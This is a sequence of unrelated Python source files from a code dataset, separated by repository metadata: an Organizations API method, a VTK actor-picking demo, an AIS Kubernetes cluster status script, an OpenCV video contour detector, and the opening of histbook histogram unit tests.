- t0 (string): The beginning of the timespan for the data. The maximum lookback period is 365 days from today.
- t1 (string): The end of the timespan for the data. t1 can be a maximum of 5 minutes after t0. The latest possible time that t1 can be is 2 minutes into the past.
- timespan (number): The timespan for which the information will be fetched. If specifying timespan, do not specify parameters t0 and t1. The value must be in seconds and be less than or equal to 5 minutes. The default is 5 minutes.
- uplink (string): Optional filter for a specific WAN uplink. Valid uplinks are wan1, wan2, cellular. Default will return all uplinks.
- ip (string): Optional filter for a specific destination IP. Default will return all destination IPs.
"""
kwargs.update(locals())
if 'uplink' in kwargs:
options = ['wan1', 'wan2', 'cellular']
assert kwargs['uplink'] in options, f'''"uplink" cannot be "{kwargs['uplink']}", & must be set to one of: {options}'''
metadata = {
'tags': ['Organizations'],
'operation': 'getOrganizationUplinksLossAndLatency',
}
resource = f'/organizations/{organizationId}/uplinksLossAndLatency'
query_params = ['t0', 't1', 'timespan', 'uplink', 'ip']
params = {k: v for (k, v) in kwargs.items() if k in query_params}
return self._session.get(metadata, resource, params)
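# --- Hedged usage sketch (not part of the original module). Only the
# _session attribute and its get/post/put/delete(metadata, resource, ...)
# calls are visible in this record, so DemoSession below is a hypothetical
# stand-in that echoes what it was asked for; the real package supplies its
# own REST session object.
class DemoSession(object):
    def get(self, metadata, resource, params=None):
        return {'operation': metadata['operation'], 'resource': resource, 'params': params}
demo = Organizations(DemoSession())
print(demo.getOrganizations())
# -> {'operation': 'getOrganizations', 'resource': '/organizations', 'params': None}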
| 36.443182
| 264
| 0.613138
|
4a18a8d3c4414bcd820dd8941ebaba8963026ebd
| 4,220
|
py
|
Python
|
src/Python/Picking/HighlightPickedActor.py
|
ajpmaclean/vtk-examples
|
1a55fc8c6af67a3c07791807c7d1ec0ab97607a2
|
[
"Apache-2.0"
] | 81
|
2020-08-10T01:44:30.000Z
|
2022-03-23T06:46:36.000Z
|
src/Python/Picking/HighlightPickedActor.py
|
ajpmaclean/vtk-examples
|
1a55fc8c6af67a3c07791807c7d1ec0ab97607a2
|
[
"Apache-2.0"
] | 2
|
2020-09-12T17:33:52.000Z
|
2021-04-15T17:33:09.000Z
|
src/Python/Picking/HighlightPickedActor.py
|
ajpmaclean/vtk-examples
|
1a55fc8c6af67a3c07791807c7d1ec0ab97607a2
|
[
"Apache-2.0"
] | 27
|
2020-08-17T07:09:30.000Z
|
2022-02-15T03:44:58.000Z
|
#!/usr/bin/env python
# noinspection PyUnresolvedReferences
import vtkmodules.vtkRenderingOpenGL2
from vtkmodules.vtkCommonColor import vtkNamedColors
from vtkmodules.vtkCommonCore import vtkMinimalStandardRandomSequence
from vtkmodules.vtkFiltersSources import vtkSphereSource
from vtkmodules.vtkInteractionStyle import vtkInteractorStyleTrackballCamera
from vtkmodules.vtkRenderingCore import (
vtkActor,
vtkPolyDataMapper,
vtkPropPicker,
vtkProperty,
vtkRenderWindow,
vtkRenderWindowInteractor,
vtkRenderer
)
colors = vtkNamedColors()
NUMBER_OF_SPHERES = 10
class MouseInteractorHighLightActor(vtkInteractorStyleTrackballCamera):
def __init__(self, parent=None):
self.AddObserver("LeftButtonPressEvent", self.leftButtonPressEvent)
self.LastPickedActor = None
self.LastPickedProperty = vtkProperty()
def leftButtonPressEvent(self, obj, event):
clickPos = self.GetInteractor().GetEventPosition()
picker = vtkPropPicker()
picker.Pick(clickPos[0], clickPos[1], 0, self.GetDefaultRenderer())
        # get the newly picked actor (the one under the cursor, or None)
self.NewPickedActor = picker.GetActor()
# If something was selected
if self.NewPickedActor:
# If we picked something before, reset its property
if self.LastPickedActor:
self.LastPickedActor.GetProperty().DeepCopy(self.LastPickedProperty)
# Save the property of the picked actor so that we can
# restore it next time
self.LastPickedProperty.DeepCopy(self.NewPickedActor.GetProperty())
# Highlight the picked actor by changing its properties
self.NewPickedActor.GetProperty().SetColor(colors.GetColor3d('Red'))
self.NewPickedActor.GetProperty().SetDiffuse(1.0)
self.NewPickedActor.GetProperty().SetSpecular(0.0)
self.NewPickedActor.GetProperty().EdgeVisibilityOn()
# save the last picked actor
self.LastPickedActor = self.NewPickedActor
self.OnLeftButtonDown()
return
def main():
# A renderer and render window
renderer = vtkRenderer()
renderer.SetBackground(colors.GetColor3d('SteelBlue'))
renwin = vtkRenderWindow()
renwin.AddRenderer(renderer)
renwin.SetSize(640, 480)
renwin.SetWindowName('HighlightPickedActor')
# An interactor
interactor = vtkRenderWindowInteractor()
interactor.SetRenderWindow(renwin)
# add the custom style
style = MouseInteractorHighLightActor()
style.SetDefaultRenderer(renderer)
interactor.SetInteractorStyle(style)
randomSequence = vtkMinimalStandardRandomSequence()
# randomSequence.SetSeed(1043618065)
# randomSequence.SetSeed(5170)
randomSequence.SetSeed(8775070)
# Add spheres to play with
for i in range(NUMBER_OF_SPHERES):
source = vtkSphereSource()
# random position and radius
x = randomSequence.GetRangeValue(-5.0, 5.0)
randomSequence.Next()
y = randomSequence.GetRangeValue(-5.0, 5.0)
randomSequence.Next()
z = randomSequence.GetRangeValue(-5.0, 5.0)
randomSequence.Next()
radius = randomSequence.GetRangeValue(0.5, 1.0)
randomSequence.Next()
source.SetRadius(radius)
source.SetCenter(x, y, z)
source.SetPhiResolution(11)
source.SetThetaResolution(21)
mapper = vtkPolyDataMapper()
mapper.SetInputConnection(source.GetOutputPort())
actor = vtkActor()
actor.SetMapper(mapper)
r = randomSequence.GetRangeValue(0.4, 1.0)
randomSequence.Next()
g = randomSequence.GetRangeValue(0.4, 1.0)
randomSequence.Next()
b = randomSequence.GetRangeValue(0.4, 1.0)
randomSequence.Next()
actor.GetProperty().SetDiffuseColor(r, g, b)
actor.GetProperty().SetDiffuse(.8)
actor.GetProperty().SetSpecular(.5)
actor.GetProperty().SetSpecularColor(colors.GetColor3d('White'))
actor.GetProperty().SetSpecularPower(30.0)
renderer.AddActor(actor)
# Start
interactor.Initialize()
renwin.Render()
interactor.Start()
if __name__ == '__main__':
main()
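# --- Hedged usage note (not part of the original example): run with a display
# attached; left-clicking a sphere colors it red with visible edges, and the
# previously picked sphere is restored from the vtkProperty saved via DeepCopy.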
| 31.969697
| 84
| 0.691232
|
4a18a927fc191f06f51717c8b60f0178c7a83c76
| 16,213
|
py
|
Python
|
deploy/prod/k8s/utils/ais_k8s.py
|
eef808a24ff/aistore
|
de1e97c34aaa28acd2db60e23216526f546c5b5f
|
[
"MIT"
] | 1
|
2020-05-20T23:43:38.000Z
|
2020-05-20T23:43:38.000Z
|
deploy/prod/k8s/utils/ais_k8s.py
|
eef808a24ff/aistore
|
de1e97c34aaa28acd2db60e23216526f546c5b5f
|
[
"MIT"
] | null | null | null |
deploy/prod/k8s/utils/ais_k8s.py
|
eef808a24ff/aistore
|
de1e97c34aaa28acd2db60e23216526f546c5b5f
|
[
"MIT"
] | 1
|
2021-01-12T15:06:40.000Z
|
2021-01-12T15:06:40.000Z
|
#
# Run with python2 - a requirement of the AIS ais_client
#
# Python script to query/validate AIS cluster state & health on k8s as deployed
# by our Helm chart.
#
# This scripts uses hard-coded knowledge of labels etc that are used/expected by
# the AIS helm chart. It should instead query those labels from the DaemonSets
# in use, and learn dynamically.
#
# Because this script needs to contact the individual daemon endpoints, it must be
# run on a k8s cluster node or from within a pod in the cluster.
#
# This script uses the ~/.kube/config mechanism for authentication.
#
# pylint: disable=unused-variable
from __future__ import print_function
import ais_client
import datetime, os, sys, threading
import ptvsd
import pytz
from kubernetes import client, config
from operator import attrgetter
from urllib3.exceptions import MaxRetryError, NewConnectionError
if os.getenv('REMOTE_DEBUG_LOCAL_IP'):
    # ptvsd expects an integer port; os.getenv returns a string
    ptvsd.enable_attach(address=(os.getenv('REMOTE_DEBUG_LOCAL_IP'), int(os.getenv('REMOTE_DEBUG_LOCAL_PORT'))), redirect_output=True)
    ptvsd.wait_for_attach()
class Ais:
"""Kitchen sink class for AIS validation on k8s
"""
appname = "ais"
#
# Proxy clusterIP service selector
#
proxySvcLabel = "app=ais"
def __init__(self, relname):
""" Load current kube config context and initialize API handles we require. """
config.load_kube_config()
self.relname = relname
self.v1api = client.CoreV1Api()
#
# Node label selectors
#
self.nodeProxyLabel = 'nvidia.com/ais-proxy=%s-%s-electable' % (relname, self.appname)
self.nodeNeProxyLabel = 'nvidia.com/ais-proxy=%s-%s-nonelectable' % (relname, self.appname)
self.nodeTargetLabel = 'nvidia.com/ais-target=%s-%s' % (relname, self.appname)
#
# Pod label selectors
#
self.podProxyLabel = "release=%s,app=ais,component=proxy" % relname
self.podNeProxyLabel = "release=%s,app=ais,component=ne_proxy" % relname
self.podTargetLabel = "release=%s,app=ais,component=target" % relname
self.refreshAisK8sState()
self.refreshAisDaemonState()
def refreshAisK8sState(self, quiet=False):
""" Query k8s for AIS state. """
#
# Load nodes labeled as per nodeSelectors for proxy, ne-proxy, target
#
if not quiet:
print("Querying AIS k8s cluster nodes ...")
self.nodes_proxy = sorted(self.v1api.list_node(label_selector=self.nodeProxyLabel).items, key=attrgetter('metadata.name'))
self.nodes_neproxy = sorted(self.v1api.list_node(label_selector=self.nodeNeProxyLabel).items, key=attrgetter('metadata.name'))
self.nodes_target = sorted(self.v1api.list_node(label_selector=self.nodeTargetLabel).items, key=attrgetter('metadata.name'))
#
# Look for node labeled as initial primary proxy
#
for node in self.nodes_proxy:
if node.metadata.labels.get(u'nvidia.com/ais-initial-primary-proxy', None) == self.relname:
self.initialPrimaryNodeName = node.metadata.name
break
else:
self.initialPrimaryNodeName = None
#
# Load pods with our labels, allowing for uninitialized pods
#
if not quiet:
print("Querying AIS k8s pods ...")
proxy_pods = sorted(
self.v1api.list_pod_for_all_namespaces(label_selector=self.podProxyLabel, include_uninitialized=True).items,
key=attrgetter('spec.node_name')
)
ne_proxy_pods = sorted(
self.v1api.list_pod_for_all_namespaces(label_selector=self.podNeProxyLabel, include_uninitialized=True).items,
key=attrgetter('spec.node_name')
)
target_pods = sorted(
self.v1api.list_pod_for_all_namespaces(label_selector=self.podTargetLabel, include_uninitialized=True).items,
key=attrgetter('spec.node_name')
)
#
# Each AIS Daemon will have a dict in one of the three lists:
# {
# 'pod': pod object from k8s list_pod_for_all_namespaces,
# 'aisClientApi': ais_client api for this daemon,
# 'smap': result of daemon smap query,
# 'config': result of daemon config query,
# 'stats': result of daemon stats query
# 'snode': result of daemon snode query
# }
#
self.daemons = {
'proxy': [{
'pod': pod
} for pod in proxy_pods],
'ne_proxy': [{
'pod': pod
} for pod in ne_proxy_pods],
'target': [{
'pod': pod
} for pod in target_pods]
}
#
# Lookup Proxy ClusterIP Service
# XXX Could/should add labels to services to shorten this
#
if not quiet:
print("Querying AIS k8s services ...")
svclist = self.v1api.list_service_for_all_namespaces(label_selector=self.proxySvcLabel).items
self.service = {}
self.service['proxyClusterIP'] = {}
for svc in svclist:
if svc.spec.type == 'ClusterIP' and svc.spec.cluster_ip != 'None':
self.service['proxyClusterIP']['ip'] = svc.spec.cluster_ip
self.service['proxyClusterIP']['port'] = svc.spec.ports[0].port
break
def refreshAisDaemonState(self, quiet=False):
"""Query AIS daemons for their state."""
def createAisApiClients(daemonlist):
""" Create openapi client API handles for a list of daemons (does not initiate connection yet). """
for d in daemonlist:
if d['pod'].status.pod_ip is None:
d['aisClientApi'] = None
continue
ais_config = ais_client.Configuration()
ais_config.debug = False
ais_config.host = "http://%s:%s/v1" % (d['pod'].status.pod_ip, d['pod'].spec.containers[0].ports[0].container_port)
d['aisClientApi'] = ais_client.ApiClient(ais_config)
createAisApiClients(self.daemons['proxy'])
createAisApiClients(self.daemons['ne_proxy'])
createAisApiClients(self.daemons['target'])
def aisDaemonQuery(daemonList):
"""Query the daemon api instance for smap, config, stats and snode info."""
def query(d, key, what):
"""Thread function to grab daemon info."""
d[key] = {}
try:
d[key] = ais_client.api.daemon_api.DaemonApi(d['aisClientApi']).get(what)
except (MaxRetryError, NewConnectionError):
pass
daemonQueries = ({
'key': 'smap', 'what': ais_client.openapi_models.GetWhat.SMAP
}, {
'key': 'config', 'what': ais_client.openapi_models.GetWhat.CONFIG
}, {
'key': 'stats', 'what': ais_client.openapi_models.GetWhat.STATS
}, {
'key': 'snode', 'what': ais_client.openapi_models.GetWhat.SNODE
})
#
# Make queries to all daemons in distinct threads per query - we don't want one
# wayward daemon to hold us up.
#
started = 0
for d in daemonList:
if d['aisClientApi'] is None:
d['smap'] = {}
d['config'] = {}
d['stats'] = {}
d['snode'] = {}
d['_threadlist'] = []
continue
d['_threadlist'] = [
threading.Thread(target=query, name='%s:%s' % (d['pod'].metadata.name, q['key']), args=(d, q['key'], q['what']))
for q in daemonQueries
]
for t in d['_threadlist']:
t.setDaemon(True)
t.start()
started += 1
#
# Join all threads on completion, limiting the time we'll wait
#
joined = 0
t1 = datetime.datetime.now()
while joined < started:
for d in daemonList:
for t in d['_threadlist']:
if not t.isAlive():
joined += 1
if (datetime.datetime.now() - t1).total_seconds() > 10:
break
if joined != started:
for d in daemonList:
stuck = []
for t in d['_threadlist']:
if t.isAlive():
stuck.append(t.getName())
if len(stuck) > 0:
print(" No response: %s" % ', '.join(stuck))
if not quiet:
print("Retrieving Smap/Config/Snode/Stats from each AIS daemon ...")
aisDaemonQuery(self.daemons['proxy'])
aisDaemonQuery(self.daemons['ne_proxy'])
aisDaemonQuery(self.daemons['target'])
def _aisNodeWalk(self, nodelist, cbfunc):
""" Iterate over proxy, ne-proxy or target nodes with given callback."""
for node in nodelist:
if cbfunc(node) != 0:
break
def aisProxyNodes(self):
"""Return list of nodes labeled for proxies."""
return self.nodes_proxy
def aisNeProxyNodes(self):
"""Return list of nodes labeled for ne proxies."""
return self.nodes_neproxy
def aisTargetNodes(self):
"""Return list of nodes labeled for targets."""
return self.nodes_target
def walkProxyNodes(self, cbfunc):
"""Walk proxy nodes with callback."""
self._aisNodeWalk(self.nodes_proxy, cbfunc)
def walkNeProxyNodes(self, cbfunc):
"""Walk ne-proxy nodes with callback."""
self._aisNodeWalk(self.nodes_neproxy, cbfunc)
def walkTargetNodes(self, cbfunc):
"""Walk target nodes with callback."""
self._aisNodeWalk(self.nodes_target, cbfunc)
def _aisPodWalk(self, daemonList, cbfunc):
""" Iterate over proxy, ne-proxy or target pods with given callback."""
for d in daemonList:
if (cbfunc(d['pod'], smap=d['smap'], config=d['config'], stats=d['stats'], snode=d['snode'])) != 0:
break
def aisProxyPods(self):
"""Return list of electable proxy pods."""
return [d.pod for d in self.daemons['proxy']]
def aisNeProxyPods(self):
"""Return list of non electable proxy pods."""
return [d.pod for d in self.daemons['ne_proxy']]
def aisTargetPods(self):
"""Return list of target pods."""
return [d.pod for d in self.daemons['target']]
def walkProxyPods(self, cbfunc):
"""Walk proxy pods with callback."""
self._aisPodWalk(self.daemons['proxy'], cbfunc)
def walkNeProxyPods(self, cbfunc):
"""Walk ne-proxy pods with callback."""
self._aisPodWalk(self.daemons['ne_proxy'], cbfunc)
def walkTargetPods(self, cbfunc):
"""Walk target pods with callback."""
self._aisPodWalk(self.daemons['target'], cbfunc)
def getInitialPrimaryNodeName(self):
"""Return node name labeled initial primary, or '-' if none."""
if self.initialPrimaryNodeName is not None:
return self.initialPrimaryNodeName
return '-'
def getProxyClusterSvc(self):
"""Return IP and port of clusterIP svc for proxies."""
ip = self.service["proxyClusterIP"].get('ip', '-')
port = self.service["proxyClusterIP"].get('port', '-')
return ip, port
if len(sys.argv) != 2:
raise Exception("require ais Helm release name as first argument")
aisk8s = Ais(sys.argv[1])
def print_ais_topo(aishdl):
nodename_ipp = aishdl.getInitialPrimaryNodeName()
smap_info = {'latest_version': 0, 'latest': None}
ready_counts = {'proxy': 0, 'ne_proxy': 0, 'target': 0}
print(
"Node labeling:\n\tProxy node(s): %d\n\tNon-electable proxy node(s): %d\n\tTarget node(s): %d" %
(len(aishdl.aisProxyNodes()), len(aishdl.aisNeProxyNodes()), len(aishdl.aisTargetNodes()))
)
print("\tNode labeled as initial primary proxy: %s\n" % nodename_ipp)
ip, port = aishdl.getProxyClusterSvc()
print("\tProxy ClusterIP service: %s:%s\n" % (ip, port))
cols = ({
'head': 'POD NAME', 'fmt': '%-25s'
}, {
'head': 'NODE', 'fmt': '%-11s'
}, {
'head': 'POD IP', 'fmt': '%-16s'
}, {
'head': 'RESTARTS', 'fmt': '%-9s'
}, {
'head': 'PODSTATE', 'fmt': '%-9s'
}, {
'head': 'LAST STATE CHANGE', 'fmt': '%-18s'
}, {
'head': 'READY', 'fmt': '%-5s'
}, {
'head': 'DAEMONID', 'fmt': '%-10s'
}, {
'head': 'SMAP', 'fmt': '%-4s'
})
podlinefmt = ' ' + ' '.join([col['fmt'] for col in cols])
podhdrline = podlinefmt % tuple([col['head'] for col in cols])
def print_pod_info(pod, **kwargs):
smap = kwargs['smap']
# args_config = kwargs['config']
# stats = kwargs['stats']
snode = kwargs['snode']
nodename = pod.spec.node_name
if nodename is None:
nodename = '(unscheduled)'
component = pod.metadata.labels.get(u'component', None)
if nodename == nodename_ipp and component == 'proxy':
nodename += "*"
else:
nodename += ' '
smap_version = smap.get(u'version', '-')
if smap_version != '-' and int(smap_version) > smap_info['latest_version']:
smap_info['latest_version'] = int(smap_version)
smap_info['latest'] = smap
now = datetime.datetime.now(pytz.utc)
podstate = '-'
since = '-'
try:
statemap = pod.status.container_statuses[0].state
for attr, attrname in statemap.attribute_map.items():
checkstate = getattr(statemap, attr, None)
if checkstate is not None:
podstate = attrname
for csattr in checkstate.attribute_map.keys():
details = getattr(checkstate, csattr, None)
if details is not None and checkstate.swagger_types[csattr] == 'datetime':
delta = now - details
since = 't-' + str(delta).split('.')[0]
break
else:
since = '?'
break
except TypeError: # if statemap is not yet filled (early startup)
pass
if pod.status.container_statuses is not None:
pod_restarts = pod.status.container_statuses[0].restart_count
if pod.status.container_statuses[0].ready:
pod_ready = "True"
if component in ready_counts:
ready_counts[component] += 1
else:
pod_ready = "False"
else:
pod_restarts = '-'
pod_ready = "False"
daemonid = snode.get('daemon_id', '-')
print(podlinefmt % (pod.metadata.name, nodename, pod.status.pod_ip, pod_restarts, podstate, since, pod_ready, daemonid, smap_version))
return 0
print(podhdrline)
aishdl.walkProxyPods(print_pod_info)
aishdl.walkNeProxyPods(print_pod_info)
aishdl.walkTargetPods(print_pod_info)
print("\nLatest observed smap version summary:")
# pylint: disable=unsubscriptable-object
latest = smap_info['latest']
if latest is not None:
print(" %-25s: %d" % ("Version", smap_info['latest_version']))
print(" %-25s: %s" % ("Current primary proxy", latest[u'proxy_si'][u'daemon_id']))
print(" %-25s: %d (%d ready)" % ("Electable proxies: ", len(latest[u'pmap']) - len(latest[u'non_electable']), ready_counts['proxy']))
print(" %-25s: %d (%d ready)" % ("Non-electable proxies: ", len(latest[u'non_electable']), ready_counts['ne_proxy']))
print(" %-25s: %d (%d ready)" % ("Targets: ", len(latest[u'tmap']), ready_counts['target']))
print_ais_topo(aisk8s)
sys.exit(0)
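# --- Hedged usage note (not part of the original script), based on the argv
# check above: run with python2 from a cluster node (or an in-cluster pod)
# that has ~/.kube/config configured, e.g.
#   python2 ais_k8s.py <helm-release-name>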
| 37.18578
| 142
| 0.571208
|
4a18a9ff30bbe15f8df1b39671448a4b1578a99e
| 1,064
|
py
|
Python
|
Debris detection.py
|
SpideySanthosh/debris-detection
|
c3313899f6be16fa9d3cffb7a1c0229afbee162b
|
[
"Apache-2.0"
] | null | null | null |
Debris detection.py
|
SpideySanthosh/debris-detection
|
c3313899f6be16fa9d3cffb7a1c0229afbee162b
|
[
"Apache-2.0"
] | null | null | null |
Debris detection.py
|
SpideySanthosh/debris-detection
|
c3313899f6be16fa9d3cffb7a1c0229afbee162b
|
[
"Apache-2.0"
] | null | null | null |
import cv2
import numpy as np
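# HSV bounds below pin hue and saturation to 0 with value 0-255, so the mask
# keeps unsaturated (gray/white/black) pixels at any brightness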
lowerBound=np.array([0,0,0])
upperBound=np.array([0,0,255])
cam= cv2.VideoCapture("debris.mp4")
kernelOpen=np.ones((5,5))
kernelClose=np.ones((20,20))
font=cv2.FONT_HERSHEY_SIMPLEX
while True:
    ret, img = cam.read()
    if not ret:
        # stop when the video ends or a frame cannot be read
        break
    img = cv2.resize(img, (1366, 768))
    # convert BGR to HSV
    imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    # create the mask
    mask = cv2.inRange(imgHSV, lowerBound, upperBound)
    # morphology: opening removes speckle noise, closing fills holes
    maskOpen = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernelOpen)
    maskClose = cv2.morphologyEx(maskOpen, cv2.MORPH_CLOSE, kernelClose)
    # findContours returns 3 values in OpenCV 3.x and 2 in 4.x; taking the
    # last two keeps the code working on both
    conts, hierarchy = cv2.findContours(maskClose.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[-2:]
    cv2.drawContours(img, conts, -1, (255, 0, 0), 3)
    for i in range(len(conts)):
        x, y, w, h = cv2.boundingRect(conts[i])
        cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
        cv2.putText(img, str(i + 1), (x, y + h), font, 1, (0, 255, 255))
    cv2.imshow("camera", img)
    if cv2.waitKey(10) & 0xFF == ord('q'):
        break
cam.release()
cv2.destroyAllWindows()
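# --- Hedged helper (not part of the original script) for deriving HSV bounds
# from a sample BGR color instead of hard-coding them; the +/-10 hue margin
# and the 50 saturation/value floors are illustrative values, not taken from
# this record.
def hsv_bounds(bgr, hue_margin=10):
    hsv = cv2.cvtColor(np.uint8([[bgr]]), cv2.COLOR_BGR2HSV)[0][0]
    lower = np.array([max(int(hsv[0]) - hue_margin, 0), 50, 50])
    upper = np.array([min(int(hsv[0]) + hue_margin, 179), 255, 255])
    return lower, upper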
| 29.555556
| 90
| 0.653195
|
4a18aad9be273f0a2951f6450206a330edb1b951
| 28,228
|
py
|
Python
|
tests/test_hist.py
|
diana-hep/pandhist
|
0874f6a3a778b85974b2d59e3a6f89391f8f3fe9
|
[
"BSD-3-Clause"
] | 67
|
2018-05-07T17:09:23.000Z
|
2018-06-22T00:30:06.000Z
|
tests/test_hist.py
|
diana-hep/pandhist
|
0874f6a3a778b85974b2d59e3a6f89391f8f3fe9
|
[
"BSD-3-Clause"
] | 31
|
2018-05-23T00:47:09.000Z
|
2018-06-22T16:45:57.000Z
|
tests/test_hist.py
|
diana-hep/pandhist
|
0874f6a3a778b85974b2d59e3a6f89391f8f3fe9
|
[
"BSD-3-Clause"
] | 7
|
2018-07-11T08:13:23.000Z
|
2021-08-29T05:20:42.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pickle
import unittest
import numpy
from histbook.axis import *
from histbook.hist import *
class TestHist(unittest.TestCase):
def runTest(self):
pass
def test_calc(self):
h = Hist(bin("x + 0.1", 10, 0, 1))
h.fill(x=[0.4, 0.3, 0.3, 0.5, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [0]])
def test_defs(self):
h = Hist(bin("y", 10, 0, 1), defs={"y": "x + 0.1"})
h.fill(x=[0.4, 0.3, 0.3, 0.5, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [0]])
def test_nofixed(self):
h = Hist(groupby("c"))
h.fill(c=["one", "two", "one", "one", "one"])
self.assertEqual(h._content["one"].tolist(), [4])
self.assertEqual(h._content["two"].tolist(), [1])
h = Hist(groupby("c"), profile("x"))
h.fill(c=["one", "two", "one", "one", "one"], x=[3, 2, 3, 5, 5])
self.assertEqual(h._content["one"].tolist(), [16, 68, 4])
self.assertEqual(h._content["two"].tolist(), [2, 4, 1])
h = Hist(profile("x"))
h.fill(x=[3, 3, 5, 5])
self.assertEqual(h._content.tolist(), [16, 68, 4])
h = Hist(weight="x")
h.fill(x=[3, 3, 5, 5])
self.assertEqual(h._content.tolist(), [16, 68])
h = Hist(profile("y"), weight="x")
h.fill(x=[2], y=[3])
self.assertEqual(h._content.tolist(), [6, 18, 2, 4])
h = Hist(bin("y", 1, -100, 100, underflow=False, overflow=False, nanflow=False), profile("y"), weight="x")
h.fill(x=[2], y=[3])
self.assertEqual(h._content.tolist(), [[6, 18, 2, 4]])
def test_bin(self):
h = Hist(bin("x", 10, 10, 11))
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [0], [0]])
h = Hist(bin("x", 10, 0, 1))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[1], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [2], [3]])
h = Hist(bin("x", 10, 0, 1, underflow=False))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [2], [3]])
h = Hist(bin("x", 10, 0, 1, overflow=False))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[1], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [3]])
h = Hist(bin("x", 10, 0, 1, nanflow=False))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[1], [0], [0], [0], [2], [2], [1], [0], [0], [1], [0], [2]])
h = Hist(bin("x", 10, 0, 1, underflow=False, overflow=False, nanflow=False))
h.fill(x=[0.4, 0.3, 123, 99, 0.3, numpy.nan, numpy.nan, numpy.nan, 0.5, -99, 0.4, 0.8])
self.assertEqual(h._content.tolist(), [[0], [0], [0], [2], [2], [1], [0], [0], [1], [0]])
h = Hist(bin("x", 2, 0, 2))
h.fill(x=[0.0, 0.0001, 0.0001, 0.5, 0.5, 0.5, 0.9999, 0.9999, 0.9999, 0.9999, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0001, 1.0001, 1.0001, 1.0001, 1.0001, 1.0001, 1.5, 1.5, 1.5, 1.5, 1.5, 1.5, 1.5, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001])
self.assertEqual(h._content.tolist(), [[0], [1 + 2 + 3 + 4], [5 + 6 + 7 + 8], [9 + 10], [0]])
h = Hist(bin("x", 2, 0, 2, closedlow=False))
h.fill(x=[0.0, 0.0001, 0.0001, 0.5, 0.5, 0.5, 0.9999, 0.9999, 0.9999, 0.9999, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0001, 1.0001, 1.0001, 1.0001, 1.0001, 1.0001, 1.5, 1.5, 1.5, 1.5, 1.5, 1.5, 1.5, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 1.9999, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001, 2.0001])
self.assertEqual(h._content.tolist(), [[1], [2 + 3 + 4 + 5], [6 + 7 + 8 + 9], [10], [0]])
def test_bin_bin(self):
h = Hist(bin("x", 3, 0, 3, underflow=False, overflow=False, nanflow=False), bin("y", 5, 0, 5, underflow=False, overflow=False, nanflow=False))
h.fill(x=[1], y=[3])
self.assertEqual(h._content.tolist(), [[[0], [0], [0], [0], [0]], [[0], [0], [0], [1], [0]], [[0], [0], [0], [0], [0]]])
def test_bin_weight(self):
h = Hist(bin("x", 10, 10, 11), weight="y")
h.fill(x=[10.4, 10.3, 10.3, 10.5, 10.4, 10.8], y=[0.1, 0.1, 0.1, 0.1, 0.1, 1.0])
